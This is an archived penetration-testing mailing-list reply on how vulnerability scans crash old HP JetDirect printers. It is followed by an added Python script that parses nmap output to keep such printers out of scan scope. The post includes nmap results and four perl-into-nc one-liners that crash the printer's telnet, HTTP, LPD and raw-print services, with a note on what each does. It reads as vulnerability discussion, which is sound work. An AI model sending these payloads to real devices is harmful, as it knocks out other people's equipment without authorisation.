Penetration Testing mailing list archives
Re: Experiences with company nCircle and their IP360 product
From: Marco Ivaldi <raptor () 0xdeadbeef info>
Date: Fri, 2 Dec 2005 19:50:41 +0100 (CET)
One other thing I've seen with nCircle (& a few other scanners), if you run internally & have any legacy HP jetdirect printers located on your network, you may want to check with nCircle to see if their scans still lock up those printers.
Actually, it's usually fairly easy to DoS printers, especially if they are using an old firmware release. Here are a few ways to reproduce some HP JetDirect vulnerabilities (tested on J3111A, firmware version G.05.35 -- it's quite old, I didn't bother to test newer releases):

root@charon:~# nmap -A x.x.x.x
Interesting ports on printer.mediaservice.pri (x.x.x.x):
(The 1655 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE    VERSION
23/tcp   open  telnet     HP JetDirect printer telnetd
80/tcp   open  http?
515/tcp  open  printer?
9100/tcp open  jetdirect?
Device type: printer|print server
Running: HP embedded
OS details: HP printer w/JetDirect card

1) TELNET. Crash all network services:

root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 23

2) HTTP. Crash all network services with funny stack dump on paper:

root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 80

3) PRINTER. The printer switches indefinitely between data recv and ready:

root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 515

4) JETDIRECT. Prints ABCD... and leaves the printer in "unstable" status:

root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 9100

Pretty lame, isn't it? In case someone's interested I've scanned the funny stack dump printed on paper and put it on-line here:
http://www.0xdeadbeef.info/stuff/hp-crash.jpg

Sincerely,

--
Marco Ivaldi
Antifork Research, Inc.   http://0xdeadbeef.info/
3B05 C9C5 A2DE C3D7 4233  0394 EF85 2008 DBFD B707
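
For the scanning concern raised in this thread, one way to keep legacy print servers out of scope for heavier scans is to build an exclusion list from a light discovery pass. The following is an added example, not part of the original post: it parses nmap's normal output (both the older header format quoted above and the current one) and flags hosts that look like JetDirect devices. The addresses are constructed, and the rule "515/tcp and 9100/tcp both open" is an assumed heuristic.

```python
import re

# Host headers in nmap's normal output: the older form quoted in the post
# and the current "Nmap scan report for" form.
HOST_RE = re.compile(r"^(?:Interesting ports on|Nmap scan report for)\s+(.*?):?\s*$")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)\s*(.*)$")
PRINT_PORTS = {515, 9100}  # LPD and raw JetDirect, both listed in the post

SAMPLE = """\
Interesting ports on printer.example (192.0.2.10):
PORT     STATE SERVICE    VERSION
23/tcp   open  telnet     HP JetDirect printer telnetd
80/tcp   open  http?
515/tcp  open  printer?
9100/tcp open  jetdirect?
Nmap scan report for 192.0.2.20
22/tcp   open  ssh        OpenSSH 8.9
9100/tcp open  jetdirect?
Nmap scan report for 192.0.2.30
515/tcp  open  printer
9100/tcp open  jetdirect
"""  # constructed sample output, documentation addresses

def fragile_printers(nmap_text):
    """Map address -> reason for each host that looks like a JetDirect printer."""
    hosts, current = {}, None
    for line in nmap_text.splitlines():
        line = line.strip()
        m = HOST_RE.match(line)
        if m:  # "name (addr)" or bare "addr": keep only the address
            current = re.sub(r"^.*\((.+)\)$", r"\1", m.group(1))
            hosts[current] = {"ports": set(), "banner": False}
            continue
        m = PORT_RE.match(line)
        if m and current:
            hosts[current]["ports"].add(int(m.group(1)))
            # Only the VERSION column counts; "jetdirect?" is just a port-name guess.
            hosts[current]["banner"] |= "jetdirect" in m.group(3).lower()
    flagged = {}
    for addr, info in hosts.items():
        if info["banner"]:
            flagged[addr] = "JetDirect version banner"
        elif PRINT_PORTS <= info["ports"]:
            flagged[addr] = "515/tcp and 9100/tcp both open"
    return flagged

if __name__ == "__main__":
    for addr, why in sorted(fragile_printers(SAMPLE).items()):
        print(addr, "#", why)
```

The flagged addresses, one per line, can be fed to nmap's `--excludefile` option or to the equivalent exclusion setting of a vulnerability scanner.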